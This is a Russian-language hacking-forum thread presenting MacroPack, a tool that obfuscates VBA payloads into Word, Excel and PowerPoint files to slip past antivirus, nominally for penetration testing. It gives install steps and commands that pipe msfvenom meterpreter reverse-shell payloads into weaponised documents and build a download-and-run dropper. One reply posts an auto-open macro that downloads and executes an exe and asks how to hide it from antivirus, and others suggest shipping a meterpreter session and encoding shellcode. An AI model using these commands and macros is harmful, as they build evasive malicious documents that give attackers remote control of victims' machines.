ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Инструменты (https://forum.antichat.xyz/forumdisplay.php?f=176)
-   -   MacroPack - Обфускация shellcode (https://forum.antichat.xyz/showthread.php?t=1620745)

Vander 11.10.2017 23:10
Приветствую, сегодня хочу представить аудитории инструмент, целью которого является обфускация вашего, или где-то позаимствованного кода. Итогом будет, как обещают авторы, снижение агрессии на него АВ-программ. Я полагаю, не нужно обьяснять, что обфусцированные примеры не стоит постить на любимый многими «хакерами» ресурс.

Вот собственно, Macro Pack:

https://forum.antichat.xyz/attachmen...4436848e10.png

Macro Pack - это инструмент, используемый для автоматизации обфускации и генерации документов MS Office для проведения тестирования на проникновение. Macro Pack – позволяет обойти алгоритмы выявления вредоносного кода антивирусными программами и упростит преобразование vba –полезной нагрузки в окончательный документ Office.

Более подробная информация находится тут:

> sevagas/macro_pack

Особенности:
  • Отсутствует необходимость конфигурирования
  • Необходимые действия могут быть выполнены одной строкой кода
  • Создание Word, Excel и PowerPoint документов
Инструмент совместим с полезными нагрузками, создаваемыми популярными пентест инструментами (Metasploit, Empire, ...). Также легко сочетается с другими утилитами. Этот инструмент написан на Python3 и работает как на платформе Linux, так и на платформе Windows.

Примечание:
Цитата:

Для Windows необходим подлинный пакет MS Office для автоматической генерации документов Office или троянских функций
Обфускация:
  • Переименование функций
  • Переименование переменных
  • Удаление пробелов
  • Удаление комментариев
  • Кодирующие строки
Обратите внимание, что основная цель обфускации Macro Pack заключается не в противодействии обратной инженерии, а в предотвращении обнаружения антивируса.

Установка:

Код:


Код:
git clone https://github.com/sevagas/macro_pack
cd macro_pack
https://forum.antichat.xyz/attachmen...dd3c370d36.png

Код:


Код:
pip3 install -r requirements.txt
https://forum.antichat.xyz/attachmen...9e2960f15c.png

Примечание. Для Windows вам необходимо загрузить вручную pywin32

> https://sourceforge.net/projects/pywin32/files/pywin32/

Справка:

Код:


Код:
macro_pack.py  --help

https://forum.antichat.xyz/attachmen...7586d399a9.png

Использование:

Обфускация полезной нагрузки в формате vba, сгенерированной msfvenom, и помещение результата в новый файл vba.
Код:


Код:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.py -o -v meterobf.vba
Обфускация Empire stager vba файла и создание документа MS Word:
Код:


Код:
macro_pack.py -f empire.vba -o -W myDoc.docm
Создание файла MS Excel, содержащего обфускационную капельницу (загрузите файл loadload.exe и храните его как drop.exe)
Код:


Код:
echo "https: //myurl.url/payload.exe" "drop.exe" | macro_pack.py -o -t DROPPER -x "drop.xlsm"
Создание документа Word 97, содержащего обфускацию полезной нагрузки обратного подключения VBA в общей папке:
Код:


Код:
msfvenom.bat -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.exe -o -w \\ REMOTE-PC \ Share \ meter.doc
Рассмотрим это на небольшом примере:

Обфусцируем VBA от Metasploit:
Код:


Код:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba –o 123.txt
https://forum.antichat.xyz/attachmen...6c1e59af00.png

Код:


Код:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.py -o -v 1234.vba

https://forum.antichat.xyz/attachmen...e19ddaf157.png

Результат будет таким:

https://forum.antichat.xyz/attachmen...1f58a08572.png

Полагаю, инструмент окажется полезным и займет место в наборе начинающего/опытного пентестера.

Спасибо за внимание

jonni_vu 16.09.2018 08:28
Ребят в исходниках недавние обновления. Тестил кто сейчас на AV тулзу. И проблемка у меня с pip3 , в kali 2018.3 пишет что команда не найдена. install не выручает, python 3.6.6 стоит.
Вообщем не настраивается инструмент. выручайте

Doctor zlo 16.09.2018 14:19
Цитата:

jonni80 сказал(а):

Ребят в исходниках недавние обновления. Тестил кто сейчас на AV тулзу. И проблемка у меня с pip3 , в kali 2018.3 пишет что команда не найдена. install не выручает, python 3.6.6 стоит.
Вообщем не настраивается инструмент. выручайте
Сегодня поставил все отлично работает. Попробуйте установить pip3 такой командой:
Код:
sudo apt install python3-pip
потом установите зависимости и перейдите в src там будет macro_pack.py

acuntenix 29.07.2019 22:57
У меня макрос есть готовый на скачку и выполнение *.exe
Как мне зашифровать его ?

Код:


Код:
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub autoopen()
Dim ret As Long
        Dim HTTPfile As String, LocalFile As String

        HTTPfile = "https://mirror.putty.org.ru/0.71/w64/putty.exe"
        LocalFile = "C:\Users\Public\putty.exe"

        ret = URLDownloadToFile(0, HTTPfile, LocalFile, 0, 0)
        Dim CurDirBackup As String
        Shell "C:\Users\Public\putty.exe", vbNormalFocus
       
        End Sub

lomini 08.01.2020 15:43
Цитата:

acuntenix сказал(а):

У меня макрос есть готовый на скачку и выполнение *.exe
Как мне зашифровать его ?

Код:


Код:
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub autoopen()
Dim ret As Long
        Dim HTTPfile As String, LocalFile As String

        HTTPfile = "https://mirror.putty.org.ru/0.71/w64/putty.exe"
        LocalFile = "C:\Users\Public\putty.exe"

        ret = URLDownloadToFile(0, HTTPfile, LocalFile, 0, 0)
        Dim CurDirBackup As String
        Shell "C:\Users\Public\putty.exe", vbNormalFocus
     
        End Sub
Что ты добьешься тем что у тебя выполнится патти ?
сессию надо прокидывать метера

Ondrik8 17.01.2020 20:01
я чето шеллкода тут не увидел)

если сравнить с этим

https://forum.antichat.xyz/attachmen...01c1750216.png

а так хотелось узнать, как его действительно можно обфусцировать)

Ondrik8 18.01.2020 11:05
вот тут если что SHELLCODE за - Encod-ить можно) ecx86/shellcode_encoder
раз уж тема про него)


Время: 11:28